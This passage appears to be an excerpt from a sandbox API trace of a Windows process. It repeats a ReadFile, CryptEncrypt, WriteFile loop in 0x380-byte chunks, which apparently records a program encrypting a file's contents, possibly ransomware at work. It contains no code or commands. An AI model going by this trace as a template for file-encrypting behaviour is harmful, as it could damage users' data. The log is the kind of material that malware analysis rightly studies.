lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.004] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.004] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.005] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.005] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.005] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.005] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.005] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.005] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.005] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.005] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.005] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.006] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.006] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.006] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.006] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.006] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.006] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.006] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.006] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.006] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.007] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.007] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.008] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.008] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.008] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.008] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.008] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.008] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.009] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.009] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.009] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.009] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.009] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.009] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.009] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.010] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.010] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.010] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.010] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.010] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.010] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.011] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.011] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.011] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.011] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.011] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.011] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.011] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.012] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.012] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 